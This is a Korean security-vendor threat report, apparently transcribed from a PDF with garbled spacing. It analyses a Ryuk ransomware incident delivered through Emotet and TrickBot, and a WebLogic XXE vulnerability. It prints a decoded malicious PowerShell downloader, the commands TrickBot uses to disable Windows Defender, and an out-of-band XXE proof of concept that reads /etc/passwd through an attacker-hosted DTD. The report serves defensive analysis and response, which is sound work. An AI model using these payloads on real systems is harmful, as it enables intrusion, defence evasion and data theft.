Threat Intelligence Report INSIGHT EQST(이큐스트)는 Experts, Qualified Security Team 이라는 뜻으로 사이버 위협 분석 및 연구 분야에서 검증된 최고 수준의 보안 전문가 그룹입니다.
|
|
- 윤호 승
- 5 years ago
- Views:
Transcription
1 Threat Intelligence Report INSIGHT EQST(이큐스트)는 Experts, Qualified Security Team 이라는 뜻으로 사이버 위협 분석 및 연구 분야에서 검증된 최고 수준의 보안 전문가 그룹입니다.
2 Contents EQST insight IoT 보안은선택이아닌필수 1 Special Report 류크 (Ryuk) 랜섬웨어 & 트릭봇 (Trick Bot) 4 Research & Technique 오라클웹로직서버 (Oracle WebLogic Server) 에서발견된 XXE 인젝션취약점 32 Keyword & Issue 급증하는이모텟악성코드와새롭게발견된취약점 40
3 EQST insight IoT 보안은선택이아닌필수 사물인터넷 (Internet of Things, IoT) 은사물, 사람, 공간등모든것이인터넷으로연결되어정보를공유하고생성, 활용하는개념을말한다. 쉽게말해, 사물간정보교환을의미하는것으로기존 M2M(Machine to Machine) 의확 장그리고과거유비쿼터스컴퓨팅의고도화라볼수있다. ( 단위 : 조원 ) 22.9 CAGR 29.1% [ 국내사물인터넷시장규모전망 ( 출처 = 미래부 )] EQST insight 1
4 국내사물인터넷 (Internet of Things) 시장은매년성장하고있으며, 2022년에는약 23조규모에달할것으로전망되고있다. 시장규모의증가에비례하여 IoT Device의규모도증가하고있으며, 이에따른해킹시도및침해사고역시매년증가하고있는추세이다. CCTV해킹을이용한사생활정보노출, 악성코드를 IoT Device에감염시켜 Mirai Botnet, Satori Botnet을만들어 DDoS 공격을하거나악용하는사례도빈번하게발생하고있다. 이에따라국내외에서제도적논의와표준화방안및대책이필요한상황이다 년 2014 년 년 년 [IoT 취약점신고추이 ( 13~ 16 년 ) ( 출처 = KISA)] 현재국내에서는 KISA( 한국인터넷진흥원 ) 이 IoT 공통보안원칙, IoT 공통보안가이드, 홈ㆍ가전 IoT 보안가이드등을제공하고있다. 제도적으로는 IoT 보안인증서비스를자율인증및무료로운용중이다. 이제도는사물인터넷제품및연동모바일앱을대상으로일정수준의보안요건을갖추었는지시험하고, 충족시인증서를발급해주는제도이다. 국민의실생활과밀접한 IoT 제품에대한보안내재화를통하여안정성을확보하려는데그목적이있다. 하지만실제기기를생산하는영세기업의경우인증및보안을위한예산이나인력이부족한상태이다. 그러다보니제도가있음에도불구하고제대로활성화되지못하고있는현실이다. 또한, 인증대상이기기와모바일앱으로한정되어 연계어플리케이션 ( 서비스 ), 다양한프로토콜, 기기보안하드웨어 / 소프트웨어개발지침, 기기업데이트관리서버 등에대한보안검증은미흡하다. 해외의경우를살펴보면, 미국은 CTIA( 미국이동통신산업협회 ) 에서 IoT 사이버보안인증프로그램 을시행하고있다. CTIA IoT는 IoT 기기의보안설계및셀룰러연결기능을증명하고자고안된테스팅프로그램으로, 미국상무부 NTIA( 통신정보관리청 ) 및미국 NIST( 국립표준기술연구소 ) 의 IoT 보안권장사항을기반으로한다. EU는 eprivacy Regulation 에서 IoT eprivacy Regulation 을적용해 IoT 기기제조업체가설계초기부터개인정보방안을구축할수있도록좀더엄격한요구사항을적용할예정이다. 민간기업차원에서의노력도진행되고있다. GSM 협회에서는 GSMA IoT 보안지침및보안평가 를제공하고 있다. Verizon 산하의 ICSA Labs 에서는 IoT Security & Privacy 테스트및인증제도를운용중이다. 이처럼해외 에서는현재 IoT 보안을위한표준화및제도적장치를마련하기위해여러형태로논의가진행중이다. EQST insight 2
5 IoT 산업의발전을위해서는보안이선행적으로반영되어야하며모두의노력이필요한때이다. IoT 를통해우리 의삶을편리하고풍요롭게만들수있지만, 보안이담보되지않을경우악의적인해커와집단의더좋은먹잇감으 로전락할수있기때문이다. 이에미국국토안보부 (Department of Homeland Security) 에서는 IoT 안전을위한전략적원칙을세우고있으며, 그원칙은다음과같다 IoT 개발자는기기, 센서, 서비스또는 IoT의모든구성요소를설계 / 개발할때보안을고려한다. IoT 제조업체는소비자기기와개발업체관리기기모두에대한보안을향상시킨다. IoT 기기를통해서비스를구현하는서비스공급업체는해당 IoT 기기가제공하는보안기능은물론, 이서비스가사용하는인프라의기본보안도고려한다. IoT 기기를사용하는정부와핵심인프라스트럭처소유자, 그리고운용자를포함한산업과기업들의수장은제조업체와서비스제공업체에 IoT 기기보안을요구한다. 우리정부기관에서도전략적원칙을세우고 IoT 사업과관련된기관, 기업들이적극적으로참여할수있는방안과 제도를마련하여야한다. 또한, 제도가만들어져도자발적준수가어려운현상황을해결하기위해소비자와기업 들역시지속적으로보안요구활동을해야한다. IoT 보안을위해서는 IoT 기기제조업체, 서비스제공업체, 개발자, 사용자, 정부기관등모두의노력이절실한상 황이다. IoT 보안에대한필요성을공감하고, 제도적마련과안착을위해함께노력해야만 연결된모든것 인 IoT 를우리삶에보다긍정적인방향으로반영시킬수있을것이다. EQST insight 3
6 Special Report 류크 (Ryuk) 랜섬웨어 & 트릭봇 (Trick Bot) - 타깃형 (APT) 랜섬웨어와트릭봇의조합 류크 (Ryuk) 랜섬웨어의등장 류크랜섬웨어는 2018년 8월중순부터미국을포함한전세계에서 2주간 64만달러 ( 한화약 7억원 ) 를탈취한전력이있는랜섬웨어이다. 북한의해커조직으로추정되는라자루스 (Lazarus) 와연관되어있으며, 주로지능형표적공격 (APT:Advanced Persistent Threat) 을통해특정조직및기업을대상으로유포하는특징이있다. 또한, 헤르메스 (Hermes) 랜섬웨어와유사한코드부분이존재한다. 트릭봇 (Trick Bot) 이란? 트릭봇이란좀비 PC와같은봇의일종으로핵심역할을하는코어 (Core) 봇과서브 (Sub) 봇으로나뉜다. 코어봇은내부전파기능의역할을담당하며, 서브봇은정보유출기능을수행한다. 또한, 감염과동시에주기적으로공격자의악성코드저장소 (Malware Repository) 서버로접속하여, 내부버전이업데이트된트릭봇을갱신하기때문에서브봇이코어봇으로변경될수도있다. 막강한전파기능과더불어가상화폐를요구하는랜섬웨어가악성코드를대량으로유포할수있기때문에주의가요구된다. EQST insight 4
7 어떻게감염되는가? 트릭봇은대부분피싱메일에서부터시작한다. 피싱메일내첨부된워드문서와같은파일에 Visual Basic 매크로를활성화하면파워쉘이동작하여이모텟 (Emotet) 악성코드를내려받는다. 이모텟악성코드는금융정보를탈취하는뱅킹트로이목마 (Banking Trojan) 의일종으로, 금융정보뿐아니라각종정보를수집하거나 2차악성코드를내려받는트로이목마역할을하기도한다. 이모텟악성코드에감염된 PC는공격자의악성코드저장소로접근하여트릭봇을내려받고이를수행한다. 해외감염사례 지난 10월, 미국노스캐롤라이나온슬로상하수도청 (ONWASA) 에서트릭봇을이용한류크 (Ryuk) 랜섬웨어유포가있었다. 이모텟악성코드로시작하여 2차페이로드로트릭봇을내려받아전파된사례이다. 내부 IT 담당자가감염과동시에시스템을오프라인으로만드는조치를취했지만, 이미감염이진행되어일부데이터베이스및파일이암호화되었다. 사고사례 E 社 1. 공격개요및흐름도 Emotet & TrickBot Malware Diagram Information Stealer Phishing Mail *Emotet Download Server *TrickBot Download Server Malformed Malware Windows Defender OFF Inject module Public IP Check renewal Svchost.exe Process Information System Information Network Information Credential Information Banking Information Invoice.doc Emotet.exe Trickbot.exe (executor) *Information Stealer Server * Emotet Download Server List * Information Stealer Server List 2*.***.***.*5:80 9*.***.***.*4: *.***.***.*2: *.***.***.*8: *.***.***.*3: *.***.***.*2: *.***.***.*0:80 1*.***.***.*8:80 5*.***.***.*7:80 2*.***.***.*7:80 1*.***.***.*8:80 5*.***.***.*2:443 1*.***.***.*7:443 2*.***.***.*6:443 8*.***.***.*8:443 5*.***.***.*6:443 * TrickBot Download Server List 1*.***.***.*1/radiance.png 1*.***.***.*1/table.png 1*.***.***.*1/worming.png Trickbot.exe (spreader) --url "xxx.com/ryuk.exe" Propagation & Ransomware ARP(C-class) Scanning & AD Credential Login Ryuk Ransomware Server Share Folder [SMB] (C$, IPC$, ADMIN$) Trickbot.exe (executor) Ryuk.exe [ 전체공격흐름도 ] EQST insight 5
8 공격자는피싱메일을이용하여송장으로가장한워드문서를 E 社에배포했다. 워드문서내에파워쉘을이용해다 수의이모텟다운로드서버중한개로접근하여악성코드를내려받은후, 트릭봇다운로드서버에접근하여악 성코드를내려받았다. 트릭봇은실행부인 Executor 와전파부인 Spreader 로나눠져각역할을수행한다. 특히 Executor 는개인및금융 정보탈취에초점이맞춰져있는반면, Spreader 는내부스캐닝및공유폴더에접근하여특정악성코드를배포한 다. 또한, Spreader 는 Executor 기능을포함한다. Spreader 와 Executor 는트릭봇다운로드서버에주기적으로접근하여, 악성코드를내려받고실행한다. 이과정에 서공격자는스케줄러로특정시간을부여하며, 악성코드저장소에이전에내려받은파일과동일한이름을가진 Spreader 또는 Executor 가갱신된다. 2. 랜섬웨어전파흐름도 Ryuk Ransomware Diagram 12 19/09:50:59 [admin] 1004.exe 19/09:51:06 [admin] PPPPP.exe 19/09:03:01 XXXXX.exe [ 백신탐지 ] 19/08:45:05 EEEEE.exe 19/08:40:28 PPPPP.exe 19/08:15:15 MMMMM.exe 19/08:14:13 GGGGG.exe 19/08:11:06 MMMMM.exe AAAAA.exe 19/09:02: exe 19/08:44: exe 19/08:40: exe 19/08:15: exe 19/08:14: exe 19/08:11: exe 1*.***.***.*7 server00 ( 랜섬감염 ) 1*.***.***.*4 server15 ( 랜섬미감염 ) 1*.***.***.*6 server14 ( 랜섬감염 ) 1*.***.***.*4 server13 ( 랜섬감염 ) 1*.***.***.*2 server12 ( 랜섬감염 ) 1*.***.***.*2 server11 ( 랜섬감염 ) 1*.***.***.*2 server10 ( 랜섬감염 ) [admin] 19/08:49:14 [admin] 19/08:41:42 접근로그 x 접근로그 x 접근로그 x [admin] 19/08:08:10 Trick-Bot Network [admin] 19/07:32:26 [admin] 19/07:42:18 [admin] 19/07:47:29 [admin] 19/07:47:33 [admin] 19/07:49:47 [admin] 19/08:49:43 [admin] 19/07:53:20 [admin] 19/08:08:25 1*.***.***.*4 server01 ( 랜섬감염 ) 1*.***.***.*9 server02 ( 랜섬감염 ) 1*.***.***.*8 server03 ( 랜섬감염 ) 1*.***.***.*7 server04 ( 랜섬감염 ) 1*.***.***.*0 server05 ( 랜섬감염 ) 1*.***.***.*1 server06 ( 랜섬감염 ) 1*.***.***.*0 server07 ( 랜섬감염 ) 1*.***.***.*9 server08 ( 랜섬감염 ) 19/07:36: exe 19/07:45: exe 19/07:48: exe 19/07:48: exe 19/07:50: exe 19/07:50: exe 19/07:53: exe 19/08:10: exe 19/07:36:29 AAAAA.exe 19/07:45:17 OOOOO.exe IIIII.exe 19/08:48:32 BBBBB.exe 19/07:48:38 CCCCC.exe 19/07:50:47 PPPPP.exe 19/07:50:48 CCCCC.exe VVVVV.exe 19/07:50:47 IIIII.exe 19/08:10:49 DDDDD.exe 순서 : 1004.exe(Ryuk Ransomware Dropper) 생성기준 [ 랜섬웨어전파과정 ] 트릭봇네트워크는계정탈취와동시에 SMB 프로토콜을이용하여, N:N 형태로전파된다. 이중트릭봇에감염 된관리서버에서 1:N 형태의내부동일대역으로랜섬웨어를전파한뒤, 스스로를감염시키는행위를한다. 이는 Executor 방식이아닌 Spreader 형태의업데이트된모듈을갱신받아악성행위를한다. EQST insight 6
9 3. 사례분석 ( 관리서버 ) E 社의경우내부에존재하는다수의서버에류크랜섬웨어가유입되었고, 유입되기이전백신로그에서이모텟및 트릭봇과관련된로그가존재했다. [ 트릭봇생성 ] Windows 경로하위에트릭봇 (lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk 7sg7rwb.exe) 이 생성된다. [ 작업스케줄러등록 ] 생성된트릭봇은작업스케줄러 Msnetcs 서비스이름으로등록된다. 등록내용은 10 분주기로해당트릭봇을 실행한다. [ 로그인시도 ] 트릭봇의 SMB 프로토콜을이용한전파를수행하기위해, 계정정보를수집하고이를통해로그인을시도한다. EQST insight 7
10 [Download 및시작프로그램등록 ] 앞서트릭봇감염 10 분후, 44893m9uh88g9l9_nkubyhu6vfxxbh989xo7hlttkppzf29ttdu6kwppk_11c1jl.exe 이름 을가진트릭봇을내려받고바로가기링크 (.lnk) 를생성한뒤, 이를시작프로그램에등록한다. [mttvca.exe] 트릭봇은주기적으로다운로드서버에접근하고갱신된트릭봇을 %APPDATA% 하위에 VsCard 폴더를생성 하여내려받는다. [%APPDATA%VsCard] 트릭봇은각계정별로 %APPDATA%VsCard 에복제되고, 바로가기에등록된다. [ 로그온성공로그 ] 실행된트릭봇들은각계정별로그인을시도한다. EQST insight 8
11 [ 로그인시도 ] [ 랜섬웨어감염 ( 랜섬노트생성 )] 로그인성공이후특정시간에랜섬웨어를유포하여해당 PC 를감염시킨다. 피싱첨부파일분석 [ 랜섬웨어감염 ( 랜섬노트생성 )] 피싱메일은송장 (Invoice) 과관련된내용을포함하고있으며, 워드문서를첨부한다. EQST insight 9
12 [ 첨부문서 ] 피싱메일에첨부된워드문서를열면, 위그림과같이매크로기능의활성화여부에대한메시지가나타나며활성 화버튼을누르면내부에존재하는파워쉘이실행된다. [VB 매크로 ] 첨부문서내포함된파워쉘은 VB 매크로로구성되어있으며, 해당코드는난독화되어있다. 주로문자열난독화, 문자열결합및복호화함수로구성된다. EQST insight 10
13 powershell $CCF=new-object Net.WebClient; // WEB CLIENT 오브젝트생성 $FRD= @ ); // ) $MVV = 635 ; // 악성파일명 $dma=$env:public+ \ +$MVV+.exe ; // 환경변수 Public 내 635.exe 이름으로경로설정 foreach($qda in $FRD) // $FRD(SiteList) 변수의 URL 한개를탐색하여 $qda에대입 { try { $CCF.DownloadFile($qda, $dma); // SiteURL 내용을 Public\635.exe로다운로드 Invoke-Item $dma; break; } catch{} } [ 복호화된파워쉘코드 ] 복호화된파워쉘은또다른악성코드 ( 이모텟 ) 를내려받기위해웹클라이언트오브젝트를생성한다. 이후악성코드를내려받을수있는특정웹사이트들을리스트형으로만들어, 지정된이름으로이모텟악성코드를내려받는다. 웹사이트리스트들은첨부된워드문서마다다르게변형되어유포되지만, 코드구조는위와동일하다. 또한, 이모텟악성코드는 2차적으로페이로드를이용하여트릭봇을내려받는다. EQST insight 11
14 트릭봇분석 샘플요약 항목 내용 파일명 radiance.png MD5 AE6**********10CB 운영체제 Windows 샘플분류 Malware 샘플종류 Trojan.TrickBot 컴파일타임 :44:19 AV 진단명 Trojan/TrickBot 해시정보 해시항목 해시값 MD5 ae6********0cb SHA-1 8fc********def SHA e********a84 SSDEEP 61*******GA 난독화정보 난독화 내용 내부난독화 특정모듈호출시데이터난독화 EQST insight 12
15 분석내용요약 전파기능 X 전파취약점 전파 IP 대역 - - 주요악성행위 커맨드쉘 (cmd.exe) 을이용한 WinDefender 서비스중지및제거파워쉘 (powershell) 을이용한 WinDefender 서비스정지활성화악성코드복제본을생성하여레지스트리및스케줄러등록공인 IP 주소지속적확인프로세스, 시스템, 네트워크및금융정보탈취 주요네트워크 통신및 C&C 정보 W****p.com/text(1*.***.***.*6) C****p.a****.com/(5*.***.***.*4) M****p.com/raw(7*.***.***.*2) I****p.io/ip(2*.***.***.*1) I****o.net/plain(2*.***.***.*1) I****c.net/p***/clientip(3*.***.***.*8) 1*.***.***.*1/radiance.png 1*.***.***.*1/table.png 1*.***.***.*1/worming.png 2*.***.***.*5/tot335/[ 개인정보 ] 분석내용요약 해당악성코드는윈도우커맨드및파워쉘을이용하여 Windows Defender 서비스를정지및제거한다. 지속성을위해악성코드복제본을생성하여레지스트리및스케줄러에등록하며, 감염대상의공인 IP 주소를알기위해위네트워크주소에지속적으로접근한다. 이후복제본을실행하게되면특정 URL 에접근하여악성코드를내려받거나, C&C 서버로로컬 PC 정보를탈취한다. EQST insight 13
16 악성코드행위분석 행위 내용 파일변화 [ 파일변화 ] [settings.ini] EQST insight 14
17 행위 내용 파일변화 [ 스케줄러 (Msnetcs)] [ 악성코드복제본실행 ] EQST insight 15
18 행위 내용 파일변화 [ 특정모듈생성 ] 해당악성코드는 %APPDATA% 하위에악성코드복사및수정이이루어지며, 그외윈도우디펜더중지와 관련된행위를한다. 또한, %system% 하위의스케줄러폴더 (Tasks) 에스케줄을생성한다. 파일복사 ( mttvca.exe ) mssvca.exe 에서 %APPDATA% 하위복사 파일생성 ( settings(dspellcheck).ini ) 난독화파일 ( 페이크파일 ) 스케줄러생성 ( Msnetcs.job ) : 10분간격으로해당악성코드실행 VsCard 폴더내복제본실행 : 악성코드재다운로드및로컬정보전송 특정모듈생성 : 인젝션모듈 ( 네트워크정보탈취, 웹인젝터, 금융정보탈취, 공유, 프로세스정보탈취, 시스템정보탈취 ) EQST insight 16
19 행위 내용 프로세스변화 [ 명령어실행 ] 윈도우디펜더 (Windows Defender) 서비스종료및삭제 파워쉘을이용하여윈도우디펜더종료 [ 레지스트리삭제 (Win Defender)] 레지스트리변화 [ 키삭제경로 ] NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows Defender HKLM\SYSTEM\ControlSet001\services\WinDefend HKLM\SYSTEM\CurrentControlSet\services\WinDefend [ 키추가 ] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\ TaskCache\Tree\Msnetcs EQST insight 17
20 네트워크행위분석 행위 내용 패킷내용 [ 네트워크패킷 ( 공인 IP 조회 )] [ 네트워크패킷 ( 악성코드다운로드 / 정보탈취 )] EQST insight 18
21 행위 내용 [ 프로세스정보탈취 ] 패킷내용 [ 시스템정보탈취 ] EQST insight 19
22 행위 내용 패킷내용 [ 네트워크정보탈취 ] 지속적공인 IP 조회 악성코드재다운로드 개인및금융정보탈취 C2 정보 1*.***.***.*6, 5*.***.***.*4, 7*.***.***.*2, 2*.***.***.*1, 2*.***.***.*1, 3*.***.***.*8, 5*.***.***.*1, 4*.***.***.*5, 1*.***.***.*5, 1*.***.***.*2, 1*.***.***.*1, 2*.***.***.*5 EQST insight 20
23 모듈정보분석 암호화된다수의모듈중일부복호화된모듈에대해설명한다. [DLLInject Module] DLLInject 모듈은 Chrome 의로그인및웹 DB 등에패스워드및사용자이름을질의하여, 사용자계정및패스워드 를탈취한다. [dinj Module] dinj 모듈은앞서분석된 Dllinject 모듈이실행될때동적으로변경되는설정파일이며, 주로로그인및금융과관련 된 URL 페이지가포함된다. Chrome.exe 를후킹하고, 특정확장자 (*.js, *.css, *.ico 등 ) 를제외한나머지에대한데 이터를저장한다. EQST insight 21
24 [sinj Module] sinj 모듈은정적으로변경되는설정파일이며, dinj 모듈과마찬가지로금융과관련된 URL 페이지가나타난다. [dpost Module] dpost 모듈은트릭봇의정보를탈취하는 C2(Command & Control) 서버리스트를나타낸다. EQST insight 22
25 [NetworkDll Module] NetworkDll 모듈은커맨드쉘을이용하여 ipconfig, net, nltest 명령어를수행하며, 로컬 PC 의사설 IP 및 AD(Active Directory) 리스트및정보를확인한다. 그리고 dpost 에등록된수집서버로데이터를전송한다. [ShareDll Module] ShareDll 모듈은공유폴더접근및트릭봇생성과관련된정보를제공한다. 트릭봇다운로드서버인 9*.***.***.**1/radiance.png 에접근하여악성코드를내려받고, 이를공유폴더 (C$, IPC$, ADMIN$) 에 msscva.exe 이름으로복사한다. EQST insight 23
26 주요디버깅정보 [WinDefend 서비스정지 ] 파워쉘또는커맨드쉘을이용하여윈도우디펜더서비스실행중지및제거를수행한다. 해당명령은아래와같다. cmd.exe /c sc stop WinDefend cmd.exe /c sc delete WinDefend cmd.exe /c powershell Set-MpPreference DisableRealtimeMonitoring $true [ 디펜더서비스실행중지및제거 ] [ 파일복제 (%APPDATA)] 원본위치에있는트릭봇을실행하면, %appdata% 하위경로에 VsCard 폴더를생성하고악성코드를복제한다. 복사된악성코드는기존의악성코드이름의일부를바꾸고, 주요악성행위를수행한다. EQST insight 24
27 [ 코드인젝션 (svchost.exe)] 트릭봇은 svchost.exe 에주요악성행위를하는모듈 ( 스케줄링, 특정 URL 및접속, 정보탈취등 ) 을해당프로세스 에주입한다. [ 스케줄링등록 (tasks)] 복제된파일의경로를이용하여스케줄작업에등록한다. EQST insight 25
28 [ 악성코드스케줄러등록 ] 10 분주기로해당악성코드를실행한다. [ 공인 IP 확인 ] IP 주소를확인할수있는페이지로현재로컬 PC 의공인 IP 주소를확인한다. [ 정보탈취문자열생성 ] 개인정보탈취를위해현재시스템의 Hostname 및난수를생성한다. EQST insight 26
29 [ 메모리데이터 ] 난독화된모듈을디코딩후메모리에서데이터를확인한결과, C2 서버리스트및플러그인 IP 정보와특정모듈 (systeminfo, injectdll, pwgrab) 관련정보가존재하였다. 이처럼모듈에서생성된데이터는공격자의 C2 서버로전 달된다. EQST insight 27
30 [ 특정모듈통신 ] 특정모듈과연결된 C2 IP 주소를선택하여연결을시도한다. [ 특정모듈시작 ] [ 패킷전송 ] 모듈시작과동시에특정 IP 와통신을시도한다. 메모리내에서생성된문자열을분석한결과현재시스템의 OS, Service Pack Version, Adaptor 정보, 공인 IP 등의정보가 C&C 서버로전송된다. EQST insight 28
31 [ 탈취정보 (parameter)] 모듈시작과동시에특정 IP 와통신을시도한다. 메모리내에서생성된문자열을분석한결과현재시스템의 OS, Service Pack Version, Adaptor 정보, 공인 IP 등의정보가 C&C 서버로전송된다. [ 탈취정보 (Body)] TTPs 및공격정보분석 TTPS(Tactics, Techniques and Procedures) Tactics 트릭봇감염및파일암호화 Technics SMB 프로토콜을이용한공유폴더전파및랜섬웨어유포 Procedures 1 피싱메일내 VB 매크로를이용한파워쉘실행 2 이모텟다운로드및실행 3 트릭봇다운로드및실행 4 작업스케줄러등록 5 트릭봇재갱신및실행 6 관리서버랜섬웨어전파 EQST insight 29
32 C2 서버주소정보 IP 국가 1*.***.***.**1 미국 2*.***.***.**5 미국 9*.***.***.**4 미국 6*.***.***.**2 호주 4*.***.***.**8 러시아 7*.***.***.**3 러시아 1*.***.***.**2 미국 3*.***.***.**0 러시아 1*.***.***.**8 브라질 5*.***.***.**7 러시아 2*.***.***.**7 미국 1*.***.***.**8 브라질 5*.***.***.**2 러시아 1*.***.***.**7 미국 2*.***.***.**6 미국 공격자정보 주소 EQST insight 30
33 대응방안 구분 대응방안 User Level 안전한계정패스워드설정 불필요한공유폴더사용금지 출처가불분명한메일열람및링크클릭금지 확인되지않은사이트접속금지 Application Level 백신최신업데이트및주기적인정밀검사 주요데이터주기적백업 PowerShell 비활성화 VBS 비활성화 OS Level 중요서버최소권한설정 OS 최신업데이트및패치 서버접근제어사용 Network Level 악성코드전파를예방하기위해 135/139/445 PORT 포트차단 중요서버 Zone 분리 네트워크접근제어사용 C2 서버차단 내부망분리 랜섬웨어감염시조치사항 구분 대응방안 Ransom Removal 악성프로세스, 파일, 레지스트리제거 Backup Recovery 백업파일이있다면감염파일복구 Tool Recovery 해당랜섬웨어에대해공개된복구툴이있는지확인 EQST insight 31
34 Research & Technique 오라클웹로직서버 (Oracle WebLogic Server) 에서발견된 XXE 인젝션취약점 취약점개요 Oracle에서서비스하는 Java EE 기반의웹애플리케이션서버 (Web Application Server, WAS) 인웹로직에서 XXE 인젝션취약점 (CVE ) 이발견되었다. 웹로직은미들웨어로애플리케이션복구, 스레드 (Thread) 관리, 부하조절등의기능으로안정적서비스를제공한다. 뿐만아니라, DB 접속과트랜잭션을처리하는등 DB 성능을보장하는기능을수행한다. 이러한웹서버에존재하는취약점을악용하면, 권한없는공격자가시스템의계정관련정보, DB 정보등의중요데이터를탈취하여공격에활용할수있다. 웹로직 XXE 취약점의테스트과정과취약점이발생하는원인에대해살펴보고자한다. EQST insight 32
35 취약점설명 XXE(XML External Entity) 인젝션취약점을테스트하기에앞서, 간략하게취약점에대해설명하고자한다. XXE 인젝션이란취약한 XML parser( 파서 ) 가외부엔티티를참조하는 XML 값을처리할때, 공격자가삽입한공격구문이실행되어서버파일접근혹은서비스거부등이발생하는취약점이다. XXE는 DTD(Document Type Definition) 의 <ENTITY> 요소에선언하여사용할수있다. 기본적인 XXE 는 XML 요청결과를서버측에서출력해주지만, 그렇지않을경우엔티티결과를공격자서버로전 송하는 Out-of-band 방식을사용한다. 아래그림은 Out-of-band 방식을설명하고있으며, 이방식을활용하여 XXE 취약점을테스트하였다. 1 공격자는외부 DTD( 공격자서버에위치함 ) 를호출하는구문을서버에요청한다. 2, 3 공격자서버에있는 DTD 파일을불러온다. 4 희생자서버에서외부 DTD 파일을포함하여 XML에대한파싱이진행된다. 5 처리된데이터가애플리케이션을통해공격자에게전송된다. Attacker 1 3 XML request Get the DTD Information 2 5 Server 4 Attacker's server [Out-of-band 방식 ] EQST insight 33
36 영향받는소프트웨어버전 S/W 구분 취약버전 Oracle WebLogic Server 테스트환경구성정보 역할구분 정보 공격자 Windows10 희생자 Ubuntu 64-bit / Java version: 1.7.0_80 / WebLogic 취약점테스트 Step 1. 취약점테스트를위한환경구축 Ubuntu 운영체제에웹로직 v 을설치한후, 웹로직실행파일인 startweblogic.sh 을실행시켜웹로직이구동되도록한다. 디폴트값으로설정하여웹로직을설치했을경우, 실행파일이존재하는경로는아래와같다. 웹로직실행파일경로 : ~/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain [ 웹로직실행경로 ] EQST insight 34
37 희생자 IP:7001/console 에접근하여관리자콘솔을확인함으로써, 정상적으로웹로직이구동되고있음을 알수있다. [ 웹로직서버관리콘솔 ] XXE 인젝션취약점이존재하는주소 희생자 IP:7001/ws_utc/begin.do 에접근한후, 테스트케이스로임의 의파일을등록한다. 테스트에서는파일명 upload.xml 을업로드 (Import) 하였다. [ 임의의파일등록 ] EQST insight 35
38 Step 2. PoC 테스트 사용자관련정보파일 (/etc/passwd) 을불러온후출력해주는외부엔티티 dtd 를공격자서버에올려놓 고, 이를희생자의내부엔티티에서불러오도록하는 PoC 코드를실행하였다. XXE 인젝션 PoC 코드 <!DOCTYPE root [<!ENTITY % remote SYSTEM 공격자서버 IP/ dtd > %remote; %intern; %xxe; ]> dtd 내용 <!ENTITY % cmd SYSTEM file:///etc/passwd > <!ENTITY % intern <!ENTITY % xxe SYSTEM?%cmd; > > 아래그림은 PoC 실행결과를보여준다. 서버응답내사용자가요청한 /etc/passwd 내용이존재하며, 이를통해 공격자는서버의사용자관련정보를획득할수있다. [PoC 실행결과 ] EQST insight 36
39 취약점상세분석 해당취약점이발생하는위치를확인하기위해, 서버요청시임의의값을넣어오류를발생시켰다. [ 취약점발생위치확인 ] 취약점이존재하는테스트클라이언트페이지에대한처리는 ws-testpage-impl.jar 파일에서이루어진다. 공격 자에의해업로드된파일은 AbstractAction.class 에서정의한 ActionData 에저장된후, ImportTestCaseAction 함수 를실행한다. [ImportTestCaseAction 함수호출 ] EQST insight 37
40 ImportTestCaseAction() process() execute() 순으로함수가실행되면서업로드한파일에대한파싱을진행한 다. execute() 함수에서취약점테스트시삽입한공격 XML 구문이객체로변환 ( 언마샬링 ) 되는데, 이때 XML 을 검증하지않고처리하여취약점이발생하는것이다. [ 언마샬링시취약점발생 ] EQST insight 38
41 공격시나리오 웹로직에존재하는 XXE 인젝션취약점을악용해내부시스템침투및중요정보탈취하는시나리오는다음과같다. 취약한웹페이지 웹서버 취약점탐색 WWW 공격자 CVE 서버주요정보탈취정보활용재공격수행 중요정보탈취 데이터베이스 5 [ 공격시나리오 ] 1 공격자가운영중인사이트의특정페이지에서위험도가높은신규취약점을발견함 2 취약한페이지에서악의적인 XXE 요청을시도함 3 공격을통해웹서버내의주요정보 ( 시스템설정파일, 소스코드 ) 들을습득함 4 획득한정보를통해서버에대한공격을재수행함 5 공격에성공하여연동된시스템에접근하거나중요정보를탈취함 대응방안 Oracle 에서발표한정기보안패치를적용하여, WebLogic 최신버전으로업데이트한다. 또한이와별개로취약점 에영향을받는 7001 번포트에대해승인된관리자혹은시스템에서만접근할수있도록적절한접근통제를해야 한다. Oracle 보안패치 : EQST insight 39
42 Keyword & Issue 급증하는이모텟악성코드와새롭게발견된취약점 [ 랜섬웨어 (Ransomware), 멀웨어 (Malware), 사이버범죄 (CyberCrime), 피싱 (Phishing), 이모텟 (Emotet), 비트코인 (BTC)] EQST는 Secudium Intelligence를통해 SNS 상에서가장많이언급되고있는해시태그를분석하여, 최근이슈가되고있는보안키워드를추출하였다. 추출된주요키워드는 랜섬웨어 (Ransomware), 악성코드 (Malware), 사이버범죄 (CyberCrime), 피싱 (Phishing), 이모텟 (Emotet), 비트코인 (BTC) 이다. 특히 피싱 (Phishing), 이모텟 (Emotet) 은지난달대비자주언급되고있는키워드이다. 주요보안키워드를통해 11월의보안동향을살펴보고자한다. EQST insight 40
43 주요키워드 1 다시급증하는이모텟 (Emotet) 악성코드, 이메일정보유출하는모듈추가 최근이모텟악성코드가드로퍼 1 형태로사용되어류크 (Ryuk) 랜섬웨어를감염시킨사례가발생하였으며, 이로인해해당키워드가많이언급되었다. 최근발생한류크랜섬웨어공격을보면, 이모텟이반복적으로생성되어다른프로세스에주입되고스케줄작업, 레지스트리키, 시작폴더바로가기를통해지속적으로등록된다. 이후트릭봇과같은 2차페이로드를다운받아, 이를통해류크랜섬웨어가유포된다. 이모텟악성코드는뱅킹트로이목마와같은악성코드배포에사용하는데, 이는파밍 (Pharming) 기법과유사하다. 웹페이지, 이메일등을통해유용한프로그램으로속여사용자의개인정보를탈취하는악성코드이다. 주로금융거래정보를탈취하는뱅킹트로이목마로사용되고있지만, 최근에는이메일관련정보를탈취하는기능이추가된모듈이등장하였다. 공격자는이모듈을이용해 180일이내에보냈거나받은모든이메일의주소와본문을탈취할수있으며, 그결과다량의개인정보를획득할수있다. 공격자는개인상호간메시지 (IPM) 루트폴더에있는이메일을크롤링한후, 이메일본문의 16KB 크기만큼을공격자의 C&C 서버로전송한다. 아래그림은이모텟악성코드를활용한이메일정보탈취과정을나타낸다. 공격자는이모텟악성코드에감염된컴 퓨터에자신의 C2 서버로부터이모텟모듈을다운받아활성화시킨다. 이모듈은이메일을검사하고, 탈취한이메일 